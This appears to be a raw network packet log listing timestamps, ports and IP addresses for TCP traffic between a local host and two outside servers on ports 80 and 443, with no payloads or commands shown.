Sep 4, 2024 17:37:10.368253946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368266106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368275881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368288994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368290901 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368299007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368310928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368314981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368321896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368333101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368338108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368344069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368351936 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368355989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368371010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368393898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368581057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368592024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368602037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368612051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368622065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368626118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368638039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368648052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368648052 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368660927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368670940 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368671894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368680000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368710041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368722916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368736029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368755102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368765116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368769884 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368777990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.368788958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368813992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368829012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.368967056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369081974 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369085073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369096994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369107008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369117975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369118929 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369126081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369129896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369148016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369151115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369163036 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369172096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369174004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369185925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369193077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369195938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369204998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369209051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369220972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369235039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369237900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369246960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369247913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369256973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369266987 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369270086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369282961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369291067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369294882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369318008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369326115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369532108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369544029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369554043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369565010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369574070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.369576931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369604111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.369613886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.423926115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.423935890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.423945904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.423989058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424016953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424047947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424058914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424093008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424118996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424129009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424137115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424170017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424170017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424184084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424221992 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424232006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424242020 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424251080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424264908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424264908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424277067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424280882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424304008 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424329042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424396038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424407959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424441099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424463987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424477100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424494028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424504042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424509048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424521923 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424544096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424597025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424607038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424616098 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424628973 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424638033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424643993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424647093 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424660921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424662113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424676895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424696922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424812078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424824953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424833059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424841881 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424853086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424861908 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424865007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424870014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424880028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424890995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424899101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424906015 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424915075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424921036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424925089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.424941063 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.424958944 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425088882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425100088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425132036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425235987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425246954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425266027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425276041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425282955 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425283909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425296068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425297976 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425306082 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425316095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425319910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425327063 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425337076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425340891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425348043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425354958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425359011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425369024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425375938 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425379038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425389051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425400019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425407887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425407887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425431013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425626993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425667048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425692081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425704002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425713062 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425724030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425733089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425740004 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425761938 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425769091 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425786972 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425796986 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425805092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425815105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425823927 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425827980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425836086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425848007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.425852060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425858021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.425885916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426146984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426158905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426168919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426199913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426211119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426240921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426250935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426259041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426270008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426278114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426280022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426290035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426292896 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426317930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426326990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426369905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426381111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426389933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426399946 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426410913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426433086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426518917 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426529884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426538944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426548004 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426558018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426564932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426568985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426584005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426590919 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426597118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426606894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426606894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426618099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426625013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426629066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426631927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426640034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426650047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426651001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426660061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426668882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426676035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426680088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426688910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426688910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426692963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426703930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426712036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426713943 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426724911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426726103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426739931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.426743984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426767111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.426783085 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.427396059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427406073 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427414894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427423954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427433014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427443027 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427440882 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.427453995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427460909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.427473068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427481890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.427489042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.427508116 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.427526951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.427898884 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.427915096 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.427958012 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.427969933 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.427978992 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.428004026 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.428376913 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.428391933 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.428437948 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.428443909 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.428978920 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.428999901 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.429040909 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.429048061 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.429058075 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.429058075 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.429080009 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.429086924 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.429096937 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.429107904 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.429128885 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.430011988 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430028915 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430074930 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430075884 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.430087090 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430114031 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430128098 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.430135012 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430150986 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.430165052 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.430809975 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430823088 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430874109 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.430880070 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430890083 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430907965 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430928946 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.430937052 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.430949926 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.430974960 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.457636118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457650900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457663059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457699060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457705021 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.457710028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457720041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457720995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.457731009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457746029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.457772017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.457828045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457839966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457849026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457859039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457863092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.457870007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457880020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.457887888 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.457910061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.457995892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458007097 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458017111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458038092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458045959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.458235979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458245039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458254099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458264112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458268881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458277941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.458278894 CEST	49719	80	192.168.2.6	147.45.44.104
